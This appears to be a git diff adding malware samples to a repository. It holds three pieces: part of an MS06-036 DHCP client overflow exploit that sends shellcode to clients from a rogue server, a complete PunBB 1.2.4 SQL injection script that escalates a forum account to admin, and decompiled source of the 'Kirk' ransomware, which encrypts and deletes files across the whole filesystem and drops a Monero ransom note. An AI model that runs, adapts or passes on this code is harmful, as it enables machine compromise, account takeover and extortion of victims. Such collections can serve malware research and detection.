+"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \ +"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5" + + + +netopt = {'client_listen_port':"68", + 'server_listen_port':"67", + 'listen_address':"0.0.0.0"} + + +def substr(i,o,off): + begin=i[:off] + end=i[off+len(o):] + ret=begin+o+end + return ret + +def io(i): + str="" + a=chr(i % 256) + i=i >> 8 + b=chr(i % 256) + i=i >> 8 + c=chr(i % 256) + i=i >> 8 + d=chr(i % 256) + + str+="%c%c%c%c" % (a,b,c,d) + + return str + +class Server(DhcpServer): + def __init__(self, options): + DhcpServer.__init__(self,options["listen_address"], + options["client_listen_port"], + options["server_listen_port"]) + + def HandleDhcpDiscover(self, packet): + my_reqip = '' + + my_reqip = default_ip + + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received discover from %s (%s)" % (mymac,my_reqip) + + mpacket = DhcpPacket() + mpacket.CreateDhcpOfferPacketFrom(packet) + mpacket.SetOption("dhcp_message_type",[2]) + mpacket.SetOption("yiaddr", ipv4(my_reqip).list()) + mpacket.SetOption("siaddr", ipv4(server_ip).list()) + mpacket.SetOption("ip_address_lease_time",[0,0,7,8]) + mpacket.SetOption("flags",[0,0]) + mpacket.SetOption("server_identifier", ipv4(server_ip).list()) + mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list()) + mpacket.SetOption("domain_name_server", ipv4(our_ip).list()) + mpacket.SetOption("router",ipv4(our_ip).list()) + + mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list()) + + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + + p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('') + + print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip) + sendp(p, iface=inet_face, verbose=False) + + def HandleDhcpRequest(self, packet): + + + ip = packet.GetOption("request_ip_address") + sid = packet.GetOption("server_identifier") + ciaddr = packet.GetOption("ciaddr") + my_reqip = '' + try: + data = packet.options_data['request_ip_address'] + for i in range(0,len(data),4) : + if len(data[i:i+4]) == 4 : + my_reqip += ipv4(data[i:i+4]).str() + except: + my_reqip = default_ip + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received request from %s (%s)" % (my_reqip,mymac) + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mypacket = DhcpPacket() + mypacket.CreateDhcpAckPacketFrom(packet) + mypacket.SetOption("yiaddr", ipv4(my_reqip).list()) + + dumbstr = "\x90" * 0xFF + + # we're looking for a jmp/call ebx ?! or landing in our codespace + # directly + + # C5 converts to 253C + # BB = 2557 + # AA = 00AC + # DD = 258C + # EE = 03B5 + # 88 = 00D6 + # 99 = 00EA + # F3 = 2591 + # B0 = 2264 + # 8F = 00c5 + + eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64" + #eipstr = "C" * 0xFF + + + payload = "\x42" * 0xFF + payload = substr(payload, scode, 1) + + + ## find location in heap to ret2 + # find offset & append as many "\x26\x6e\x43\x6e" + # to increment ebx to a non trashed location (since ebx points to our code) + # then push ebx \x53 and \xc4 (retn) + # + # we're looking for a pop+pop+ret or a jmp/call ebx to return to our + # unicode filtered input + # note it must be iwthin the bounds of 0x0000**** - 0x0070**** + # or 0x22***** <-- wont help us + + append = "\x0f\xff" + ( "\x90" * 0xff ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( payload[0:254]) + "\x00" + + print "Length of our attack: %r" % len(append) + + eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face)) + p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024) + print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip) + for i in p: + sendp(eth/i, iface=inet_face, verbose=False) + + def HandleDhcpDecline(self, packet): + return + #print "** Dhcp Declined" + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpRelease(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpInform(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + + +print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow" +print "\t by redsand@blacksecurity.org" +print "Usage: %s [interface] [forced request ip]" % sys.argv[0] +print "" + + +if len(sys.argv) > 1: + inet_face = sys.argv[1] + +if len(sys.argv) > 2: + default_ip = sys.argv[2] + +print "Listening for client requests:\n" +print "Listening on interface: %s" % inet_face +print "Using default address: %s" % default_ip + +server = Server(netopt) + +while True : + server.GetNextDhcpPacket() diff --git a/Python/Exploit.Python.PunBB.a b/Python/Exploit.Python.PunBB.a new file mode 100644 index 00000000..7e050115 --- /dev/null +++ b/Python/Exploit.Python.PunBB.a @@ -0,0 +1,130 @@ +#!/usr/bin/python +####################################################################### +# _ _ _ _ ___ _ _ ___ +# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ +# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ +# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| +# +####################################################################### +# Proof of concept code from the Hardened-PHP Project +####################################################################### +# +# -= PunBB 1.2.4 =- +# change_email SQL injection exploit +# +# user-supplied data within the database is still user-supplied data +# +####################################################################### + +import urllib +import getopt +import sys +import string + +__argv__ = sys.argv + +def banner(): + print "PunBB 1.2.4 - change_email SQL injection exploit" + print "Copyright (C) 2005 Hardened-PHP Project\n" + +def usage(): + banner() + print "Usage:\n" + print " $ ./punbb_change_email.py [options]\n" + print " -h http_url url of the punBB forum to exploit" + print " f.e. http://www.forum.net/punBB/" + print " -u username punBB forum useraccount" + print " -p password punBB forum userpassword" + print " -e email email address where the admin leve activation email is sent" + print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails" + print "" + sys.exit(-1) + +def main(): + try: + opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") + except getopt.GetoptError: + usage() + + if len(__argv__) < 10: + usage() + + username = None + password = None + email = None + domain = None + host = None + for o, arg in opts: + if o == "-h": + host = arg + if o == "-u": + username = arg + if o == "-p": + password = arg + if o == "-e": + email = arg + if o == "-d": + domain = arg + + # Printout banner + banner() + + # Check if everything we need is there + if host == None: + print "[-] need a host to connect to" + sys.exit(-1) + if username == None: + print "[-] username needed to continue" + sys.exit(-1) + if password == None: + print "[-] password needed to continue" + sys.exit(-1) + if email == None: + print "[-] email address needed to continue" + sys.exit(-1) + if domain == None: + print "[-] catch all domain needed to continue" + sys.exit(-1) + + # Retrive cookie + params = { + 'req_username' : username, + 'req_password' : password, + 'form_sent' : 1 + } + + wclient = urllib.URLopener() + + print "[+] Connecting to retrieve cookie" + + req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) + info = req.info() + if 'set-cookie' not in info: + print "[-] Unable to retrieve cookie... something is wrong" + sys.exit(-3) + cookie = info['set-cookie'] + cookie = cookie[:string.find(cookie, ';')] + print "[+] Cookie found - extracting user_id" + user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] + print "[+] User-ID: %d" % (int(user_id)) + wclient.addheader('Cookie', cookie); + + email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\',' + append = 'group_id=\'1' + email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain + + params = { + 'req_new_email' : email, + 'form_sent' : 1 + } + + print "[+] Connecting to request change email" + req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) + + print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin" + +if __name__ == "__main__": + main() + + + diff --git a/Python/Kirk_ransomware.py b/Python/Kirk_ransomware.py new file mode 100644 index 00000000..3d4ff750 --- /dev/null +++ b/Python/Kirk_ransomware.py @@ -0,0 +1,208 @@ +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.14 (default, Sep 25 2017, 09:53:22) +""" + +Kirk encryptor + +""" +import tkMessageBox, Tkinter as tk +from Crypto.Cipher import AES +from Crypto.PublicKey import RSA +from Crypto.Hash import SHA256 +import os, random, string, time, threading, Queue, datetime +tn = datetime.datetime.now() +tn_2 = datetime.datetime.strftime(tn + datetime.timedelta(days=2), '%c') +tn_7 = datetime.datetime.strftime(tn + datetime.timedelta(days=7), '%c') +tn_14 = datetime.datetime.strftime(tn + datetime.timedelta(days=14), '%c') +tn_30 = datetime.datetime.strftime(tn + datetime.timedelta(days=30), '%c') +tn_31 = datetime.datetime.strftime(tn + datetime.timedelta(days=31), '%c') +tn = datetime.datetime.strftime(tn, '%c') +deltas = [ + tn_2, tn_7, tn_14, tn_30, tn_31] +TK_TITLE = 'Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0' +NOTE_NAME = 'RANSOM_NOTE.txt' +PWDF_NAME = 'pwd' +THREAD_NUM = 22 +queue = Queue.Queue() +files_to_enc = [] +pubkeyDat = '-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAoQpUk7lhDoenoPTCLRjG\nLStBjoT9owWl3HuYezrpmDt60t0P4/jlrwDC06POYxGpDDUbC2SfhcvbemFXWmX/\nzCM92h94v6sxfc6GOfKLbdwudSMOJ+TOSd7XGa3okcIbAh7bVR28XPBOGcg203Z/\n7YJh+wHHnjGjOxcUZIcM3X2BPDIEuc1jxgWgDEIMmjb+yi6m3YdtAmwmurV8wb61\njXrBY936IVxYc3sxw94x9GjfsIspmdurV5En1DEkXPORp7IU5q6Zj4ZZsLwyT+xX\n5V5MdWVYhOJV4X8pLPHUPjvAHQX1POGnX/DVlieG//RXOi0mnR+Vh4OjvBsXC10V\nqrQgZZXByHOtjrdfXgZH8Izr+KuyTVRGILvj884EZ1DMI6L4sb4F9EUjcRacO/tU\nRdduUTw3Q5qsbLPQiS/V4MBEQswlH7UVMiWxfNymyvM5I3BfFeW2QwauRGH5xmaD\nsQG0Yy/AsPzvHKqoShP/LepO1bYUdUodvnfVbChPGTYzZrwmnixS/m5AxyhUh/Ex\n3cxZ5raJWnBfx72wsviuAPIrXqyzlTlNo6aPX029Oh52ezk4uYwLpN02IjJ6yUEg\nyFkqbhASCtvYjqAprvCheane2j7+U7RnjZ+jLNgMWSc5M1pdGK4YYT+U3yfWqbdG\nRSie6e+LhifKADqjHeXSAVsCAwEAAQ==\n-----END PUBLIC KEY-----' +pk = RSA.importKey(pubkeyDat) +rp = None +UNDOC_EXTS = [ + 'cfr', 'ytd', 'sngw', 'tst', 'skudef', 'dem', 'sims3pack', 'hbr', + 'hkx', 'rgt', 'ggpk', 'ttarch2', 'hogg', 'spv', 'bm2', 'lua', 'dff', + 'save', 'rgssad', 'scm', 'aud', 'rxdata', 'mcmeta', 'bin', 'mpqe', + 'rez', 'xbe', 'grle', 'bf', 'iwd', 'vpp_pc', 'scb', 'naz', 'm2', 'xpk', + 'sabs', 'nfs13save', 'gro', 'emi', 'wad', '15', 'vfs', 'drs', 'taf', 'm4s', + 'player', 'umv', 'sgm', 'ntl', 'esm', 'qvm', 'arch00', 'tir', 'bk', 'sabl', + 'bin', 'opk', 'vfs0', 'xp3', 'tobj', 'rcf', 'sga', 'esf', 'rpack', 'DayZProfile', + 'qsv', 'gam', 'bndl', 'u2car', 'psk', 'gob', 'lrf', 'lts', 'iqm', 'i3d', 'acm', + 'SC2Replay', 'xfbin', 'db0', 'fsh', 'dsb', 'cry', 'osr', 'gcv', 'blk', '4', 'lzc', + 'umod', 'w3x', 'mwm', 'crf', 'tad', 'pbn', '14', 'ppe', 'ydc', 'fmf', 'swe', 'nfs11save', + 'tgx', 'trf', 'atlas', '20', 'game', 'rw', 'rvproj2', 'sc1', 'ed', 'lsd', 'pkz', 'rim', + 'bff', 'gct', '9', 'fpk', 'pk3', 'osf', 'bns', 'cas', 'lfl', 'rbz', 'sex', 'mrm', 'mca', + 'hsv', 'vpt', 'pff', 'i3chr', 'tor', '01', 'utx', 'kf', 'dzip', 'fxcb', 'modpak', 'ydr', + 'frd', 'bmd', 'vpp', 'gcm', 'frw', 'baf', 'edf', 'w3g', 'mtf', 'tfc', 'lpr', 'pk2', 'cs2', + 'fps', 'osz', 'lnc', 'jpz', 'tinyid', 'ebm', 'i3exec', 'ert', 'sv4', 'cbf', 'oppc', 'enc', + 'rmv', 'mta', 'otd', 'pk7', 'gm', 'cdp', 'cmg', 'ubi', 'hpk', 'plr', 'mis', 'ids', + 'replay_last_battle', 'z2f', 'map', 'ut4mod', 'dm_1', 'p3d', 'tre', 'package', 'streamed', + 'l2r', 'xbf', 'wep', 'evd', 'dxt', 'bba', 'profile', 'vmt', 'rpf', 'ucs', 'lab', 'cow', 'ibf', + 'tew', 'bix', 'uhtm', 'txd', 'jam', 'ugd', '13', 'dc6', 'vdk', 'bar', 'cvm', 'wso', 'xxx', 'zar', + 'anm', '6', 'ant', 'ctp', 'sv5', 'dnf', 'he0', 'mve', 'emz', 'e4mod', 'gxt', 'bag', 'arz', 'tbi', + 'itp', 'i3animpack', 'vtf', 'afl', 'ncs', 'gaf', 'ccw', 'tsr', 'bank', 'lec', 'pk4', 'psv', + 'los', 'civ5save', 'rlv', 'nh', 'sco', 'ims', 'epc', 'rgm', 'res', 'wld', 'sve', 'db1', 'dazip', + 'vcm', 'rvm', 'eur', 'me2headmorph', 'azp', 'ags', '12', 'slh', 'cha', 'wowsreplay', 'dor', + 'ibi', 'bnd', 'zse', 'ddsx', 'mcworld', 'intr', 'vdf', 'mtr', 'addr', 'blp', 'mlx', 'd2i', '21', + 'tlk', 'gm1', 'n2pk', 'ekx', 'tas', 'rav', 'ttg', 'spawn', 'osu', 'oac', 'bod', 'dcz', 'mgx', + 'wowpreplay', 'fuk', 'kto', 'fda', 'vob', 'ahc', 'rrs', 'ala', 'mao', 'udk', 'jit', '25', 'swar', + 'nav', 'bot', 'jdf', '32', 'mul', 'szs', 'gax', 'xmg', 'udm', 'zdk', 'dcc', 'blb', 'wxd', 'isb', + 'pt2', 'utc', 'card', 'lug', 'JQ3SaveGame', 'osk', 'nut', 'unity', 'cme', 'elu', 'db7', 'hlk', + 'ds1', 'wx', 'bsm', 'w3z', 'itm', 'clz', 'zfs', '3do', 'pac', 'dbi', 'alo', 'gla', 'yrm', 'fomod', + 'ees', 'erp', 'dl', 'bmd', 'pud', 'ibt', '24', 'wai', 'sww', 'opq', 'gtf', 'bnt', 'ngn', 'tit', 'wf', + 'bnk', 'ttz', 'nif', 'ghb', 'la0', 'bun', '11', 'icd', 'z3', 'djs', 'mog', '2da', 'imc', 'sgh', 'db9', + '42', 'vis', 'whd', 'pcc', '43', 'ldw', 'age3yrec', 'pcpack', 'ddt', 'cok', 'xcr', 'bsp', 'yaf', + 'swd', 'tfil', 'lsd', 'blorb', 'unr', 'mob', 'fos', 'cem', 'material', 'lfd', 'hmi', 'md4', 'dog', + '256', 'eix', 'oob', 'cpx', 'cdata', 'hak', 'phz', 'stormreplay', 'lrn', 'spidersolitairesave-ms', + 'anm', 'til', 'lta', 'sims2pack', 'md2', 'pkx', 'sns', 'pat', 'tdf', 'cm', 'mine', 'rbn', 'uc', 'asg', + 'raf', 'myp', 'mys', 'tex', 'cpn', 'flmod', 'model', 'sfar', 'fbrb', 'sav2', 'lmg', 'tbc', 'xpd', + 'bundledmesh', 'bmg', '18', 'gsc', 'shader_bundle', 'drl', 'world', 'rwd', 'rwv', 'rda'] +REAL_EXTS = [ + '.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.ai', + '.m2ts', '.mkv', '.mov', '.mp4', '.mpg', '.mpeg', 'mpeg4', + '.rm', '.swf', '.vob', '.wmv', '.doc', '.docx', '.pdf', + '.rar', '.jpg', '.jpeg', '.png', '.tiff', '.zip', '.7z', '.dif.z', + '.exe', '.tar.gz', '.tar', '.mp3', '.sh', '.c', '.cpp', + '.h', '.mov', '.gif', '.txt', '.py', '.pyc', '.jar', '.csv', + '.psd', '.wav', '.ogg', '.wma', '.aif', '.mpa', '.wpl', '.arj', + '.deb', '.pkg', '.db', '.dbf', '.sav', '.xml', '.html', '.aiml', + '.apk', '.bat', '.bin', '.cgi', '.pl', '.com', '.wsf', '.bmp', + '.bmp', '.gif', '.tif', '.tiff', '.htm', '.js', '.jsp', '.php', + '.xhtml', '.cfm', '.rss', '.key', '.odp', '.pps', '.ppt', '.pptx', + '.class', '.cd', '.java', '.swift', '.vb', '.ods', '.xlr', '.xls', + '.xlsx', '.dot', '.docm', '.dotx', '.dotm', '.wpd', '.wps', '.rtf', + '.sdw', '.sgl', '.vor', '.uot', '.uof', '.jtd', '.jtt', '.hwp', '.602', + '.pdb', '.psw', '.xlw', '.xlt', '.xlsm', '.xltx', '.xltm', '.xlsb', + '.wk1', '.wks', '.123', '.sdc', '.slk', '.pxl', '.wb2', '.pot', '.pptm', + '.potx', '.potm', '.sda', '.sdd', '.sdp', '.cgm', '.wotreplay', '.rofl', + '.pak', '.big', '.bik', '.xtbl', '.unity3d', '.capx', '.ttarch', '.iwi', + '.rgss3a', '.gblorb', '.xwm', '.j2e', '.mpk', '.xex', '.tiger', '.lbf', + '.cab', '.rx3', '.epk', '.vol', '.asset', '.forge', '.lng', '.sii', '.litemod', + '.vef', '.dat', '.papa', '.psark', '.ydk', '.mpq', '.wtf', '.bsa', '.re4', + '.dds', '.ff', '.yrp', '.pck', '.t3', '.ltx', '.uasset', '.bikey', '.patch', + '.upk', '.uax', '.mdl', '.lvl', '.qst', '.ddv', '.pta'] +INIT_EXTS = [] + REAL_EXTS +for ue in UNDOC_EXTS: + INIT_EXTS.append('.' + ue) +seen = [] +ALL_EXTS = [] +for re in INIT_EXTS: + if re in seen: + pass + else: + ALL_EXTS.append(re) + seen.append(re) +cols = 9 +if len(REAL_EXTS) % cols != 0: + for ec in range(cols - len(REAL_EXTS) % cols): + REAL_EXTS.append(' ') +split = [ REAL_EXTS[i:i + len(REAL_EXTS) / cols] for i in range(0, len(REAL_EXTS), len(REAL_EXTS) / cols) ] +PRETTY_EXTS = '' +for row in zip(*split): + PRETTY_EXTS += '\n ' + ('').join((str.ljust(i, 10) for i in row)) +R_NOTE = ('\n :xxoc;;,.. .\n cWW0olkNMMMKdl;. .;llxxklOc,\'\n oWMKxd, .,lxNKKOo;. :xWXklcc;. ...\'.\n k lMMNl . ON. :c. \'\'. \':....\n .WXc ;WMMMXNNXKKxdXMM. . .\n .NdoK: XMMMMMMMMMMMMMMM;oo; ...;,cxxxll. .\n .WX.K0\'WMMMWMMMMMWMNXWMooMWNO\' ..,;OKNWWWWMMMMMXk:.\n KK:xKKWMMMXNMMMMW; .. :WNKd, .. .\'cdOXKXNNNNNWWMMMMMMMW0,\n lNMXXMMMMMMMMWWMMWKk, ;0k\' .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:.. ..\n ..,;XMMMMMMMWXWWK0KK: .;. .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO. .,\n .kKXMMMMMWkoxolcc;.. .\':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN; \'.\n .MK;kWMMMWWKOc. . ..\';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW: .\n ,MW:,:x0NMMMMWW0x\' ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk. ..\n oMMN; ;odoccc;c:. ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.\n XMMMX, ....\';lldkWkodK0loc\'. .\'lxx0kOKNMMMXo.\n \'XMMMMMNc .dldXWx. ..,,coOXOkXMMMK,\n ,. .:dk0KNWMk. ... .kWMK,. ..:c .:.. .0MWMMMMO.\n .\':x0K0:. .. . . .OWMNNXO:cccdxKXWMW0o0WWMMMM;.\n 00000000000kdl:,\'. ..\'o00l \'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.\n 0000000000000000000Oxl:\' .;xKWWx .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl\n 0000000000000000000000000x;. ..,::,. .ck0KKk\' \'0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0. .\'\n 0000000000000000000000000000Oxdllc:;,....,\'... .cdkOko: ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. \'Kc:,\n 000000000000000000000000000000000OkkkxdoodxOkoooool .;okOx, .,\'...cKMXl\'oKWMMMMMMMWWNXN0 \'MMc0.\n 0000OO000000000000000000000000000000000000000kc. .:dk0c ,KNKxdKMMM0;;kMMMMMMMMWNKXO ,kW0xl\n OdloxO000000000000000000000000000000000000000000x, .,ll; .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx\n lx000000000000000000000000000000000000000000000000l .\'.. .\'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..\n 00000000000000000000000000000000000000000000000000O .. ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc\',\n 00000000000000000000000000000000000000000000000000d .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,\n 000000000000000000000000000000000000000Ko.0000000Ol .\'::odkkOOOxxxoxNMMMMNNWNXKK0k..;\'\n 0000000000000000000000000000000000000000..:000000kl .:coododkXWMMMMMMMWWMMMNNNNNKOkkx:\n :;ok00000000000000000000000000000000000O.;.d00000dc ... .........cONMMMMMMMMMNXXXN0dlddxN.\n .dk000000000000000000000000000000000000;ld,.O00kocc .. ...,;::lokKNMMMMMMMMWKOO0OxloocxM:\n OO0000000000000000000000000000000000000ol0Koc0xc:ll . ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md\n :;,\'..;loxk000000000000000000000000000000000lx..loo ,0 .\'\';lkKKNMMMMMMMMMNOd:;lc:;\'..,kWMK\n cccldxkkkO00Okdooddxk00000000000000000000000Oc\'lddl dK, .\':ollokOOOOOOOc\'.........lXMMMM,\n 000000kdoc,....;cldkO0000000000000000000000Okdodddo\'K0\'. ....... .oKMMMMMM0\n :,\'....\',;:ldkO0000000000000000000000000000Okxodddd;Xk,... .l0NMMMMMMMM:\n OO000000000000000000000000000000000000000000OkodxxxoXo,,,.. .:kKWMMMMMMMMMW\'\n dO0000000000000000000000000000000000000000000OodxxxkKl;,,,, \'dOKWMMMMMMMMMMMX\n\n _ _____ ____ _ __ ____ _ _ _ ____ ___ __ ____ ___ ____ _____ \n | |/ /_ _| _ \\| |/ / | _ \\ / \\ | \\ | / ___| / _ \\| \\/ \\ \\ / / \\ | _ \\| ____|\n | \' / | || |_) | \' / | |_) | / _ \\ | \\| \\___ \\| | | | |\\/| |\\ \\ /\\ / / _ \\ | |_) | _| \n | . \\ | || _ <| . \\ | _ < / ___ \\| |\\ |___) | |_| | | | | \\ V V / ___ \\| _ <| |___ \n |_|\\_\\___|_| \\_\\_|\\_\\ |_| \\_\\/_/ \\_\\_| \\_|____/ \\___/|_| |_| \\_/\\_/_/ \\_\\_| \\_\\_____|\n\n\nOh no! The Kirk ransomware has encrypted your files!\n\n\n-----------------------------------------------------------------------------------------------------\n\n> ! IMPORTANT ! READ CAREFULLY:\n\nYour computer has fallen victim to the Kirk malware and important files have been encrypted - locked\nup so they don\'t work. This may have broken some software, including games, office suites etc.\n\nHere\'s a list of some the file extensions that were targetted:\n{}\n\nThere are an additional {} file extensions that are targetted. They are mostly to do with games.\n\nTo get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of\ninfection will be charged double. Further time penalties are listed below. The time of infection has\nbeen logged.\n\nAny files with the extensions listed above will now have the extra extension \'.kirked\', these files\nare encrypted using military grade encryption.\n\nIn the place you ran this program from, you should find a note (named {}) similar to this one.\nYou will also find a file named \'{}\' - this is your encrypted password file. Although it was\ngenerated by your computer, you have no way of ever decrypting it. This is due to the security\nof both the way it was generated and the way it was encrypted. Your files were encrypted using\nthis password.\n\n ____ ____ ___ ____ _ __ _____ ___ _____ _ _ _____ ____ _____ ____ ____ _ _ _____ _ \n/ ___|| _ \\ / _ \\ / ___| |/ / |_ _/ _ \\ |_ _| | | | ____| | _ \\| ____/ ___| / ___| | | | ____| |\n\\___ \\| |_) | | | | | | \' / | || | | | | | | |_| | _| | |_) | _| \\___ \\| | | | | | _| | |\n ___) | __/| |_| | |___| . \\ | || |_| | | | | _ | |___ | _ <| |___ ___) | |___| |_| | |___|_|\n|____/|_| \\___/ \\____|_|\\_\\ |_| \\___/ |_| |_| |_|_____| |_| \\_\\_____|____/ \\____|\\___/|_____(_)\n\n "Logic, motherfucker." ~ Spock.\n\n\nDecrypting your files is easy. Take a deep breath and follow the steps below.\n\n 1 ) Make the proper payment.\n Payments are made in Monero. This is a crypto-currency, like bitcoin.\n You can buy Monero, and send it, from the same places you can any other\n crypto-currency. If you\'re still unsure, google \'bitcoin exchange\'.\n\n Sign up at one of these exchange sites and send the payment to the address below.\n\n Make note of the payment / transaction ID, or make one up if you have the option.\n\n Payment Address (Monero Wallet):\n 4AqSwfTexbNaHcn8giSJw3KPiWYHGBaCF9bdgPxvHbd5A8Q3Fc7n6FQCReEns8uEg8jUo4BeB79rwf4XSfQPVL1SKdVp2jz\n\n Prices:\n Days : Monero : Offer Expires\n 0-2 : 50 : {}\n 3-7 : 100 : {}\n 8-14 : 200 : {}\n 15-30 : 500 : {}\n\n Note: In 31 days your password decryption key gets permanently deleted.\n You then have no way to ever retrieve your files. So pay now.\n\n 2 ) Email us.\n Send your pwd file as an email attachment to one of the email addresses below.\n Include the payment ID from step 1.\n\n Active email addresses:\n kirk.help@scryptmail.com\n kirk.payments@scryptmail.com\n\n 3 ) Decrypt your files.\n You will recieve your decrypted password file and a program called \'Spock\'.\n Download these both to the same place and run Spock.\n Spock reads in your decrypted password file and uses it to decrypt all of the\n affected files on your computer.\n\n > IMPORTANT !\n The password is unique to this infection.\n Using an old password or one from another machine will result in corrupted files.\n Corrupted files cannot be retrieved.\n Don\'t fuck around.\n\n 4 ) Breathe.\n\n\n _ _____ _______ _ ___ _ _ ____ \n | | |_ _\\ \\ / / ____| | | / _ \\| \\ | |/ ___|\n | | | | \\ \\ / /| _| | | | | | | \\| | | _ \n | |___ | | \\ V / | |___ | |__| |_| | |\\ | |_| |\n |_____|___| \\_/ |_____| |_____\\___/|_| \\_|\\____|\n _ _ _ ____ ____ ____ ___ ____ ____ _____ ____ \n / \\ | \\ | | _ \\ | _ \\| _ \\ / _ \\/ ___|| _ \\| ____| _ \\ \n / _ \\ | \\| | | | | | |_) | |_) | | | \\___ \\| |_) | _| | |_) |\n / ___ \\| |\\ | |_| | | __/| _ <| |_| |___) | __/| |___| _ < \n /_/ \\_\\_| \\_|____/ |_| |_| \\_\\\\___/|____/|_| |_____|_| \\_\\\n\n\n\n').format(PRETTY_EXTS, len(UNDOC_EXTS), NOTE_NAME, PWDF_NAME, tn_2, tn_7, tn_14, tn_30) + +def select_files(): + global queue + ext = ALL_EXTS + for root, dirs, files in os.walk('/'): + for file in files: + if file.lower().endswith(tuple(ext)): + queue.put(os.path.join(root, file)) + +class Worker(threading.Thread): + def __init__(self, queue): + threading.Thread.__init__(self) + self.queue = queue + + def run(self): + while True: + qItem = self.queue.get() + try: + self.encrypt(qItem) + with open(qItem, 'wb'): + pass + try: + os.remove(qItem) + except Exception as ex: + pass + except Exception as ex: + pass + self.queue.task_done() + + def encrypt(self, filename): + global rp + chunk_size = 65536 + outputFile = filename + '.kirked' + filesize = str(os.path.getsize(filename)).zfill(16) + IV = '' + for i in range(16): + IV += chr(random.randint(0, 255)) + encryptor = AES.new(rp, AES.MODE_CBC, IV) + with open(filename, 'rb') as (infile): + with open(outputFile, 'wb') as (outfile): + outfile.write(filesize) + outfile.write(IV) + while True: + chunk = infile.read(chunk_size) + if len(chunk) == 0: + break + else: + if len(chunk) % 16 != 0: + chunk += ' ' * (16 - len(chunk) % 16) + outfile.write(encryptor.encrypt(chunk)) + +def drop_note(): + with open(NOTE_NAME, 'wb+') as (rnf): + rnf.write(R_NOTE) + +def Main(): + global rp + orp = tn + ('').join((random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(64))) + rp = SHA256.new(orp).digest() + if rp == None: + quit() + try: + with open(PWDF_NAME, 'wb') as (pwdf): + encp = pk.encrypt(orp, 32)[0] + pwdf.write(encp) + except Exception: + pass + for i in range(THREAD_NUM): + w = Worker(queue) + w.setDaemon(True) + w.start() + tkMessageBox.showinfo(TK_TITLE, 'The LOIC is initializing for your system ...\nThis may take some time') + select_files() + queue.join() + drop_note() + root = tk.Tk() + root.title('Kirk') + scrollbar = tk.Scrollbar(root) + scrollbar.pack(side=tk.RIGHT, fill=tk.Y) + T = tk.Text(root, height=50, width=110, background='black', foreground='white', yscrollcommand=scrollbar.set) + T.pack(side=tk.LEFT) + 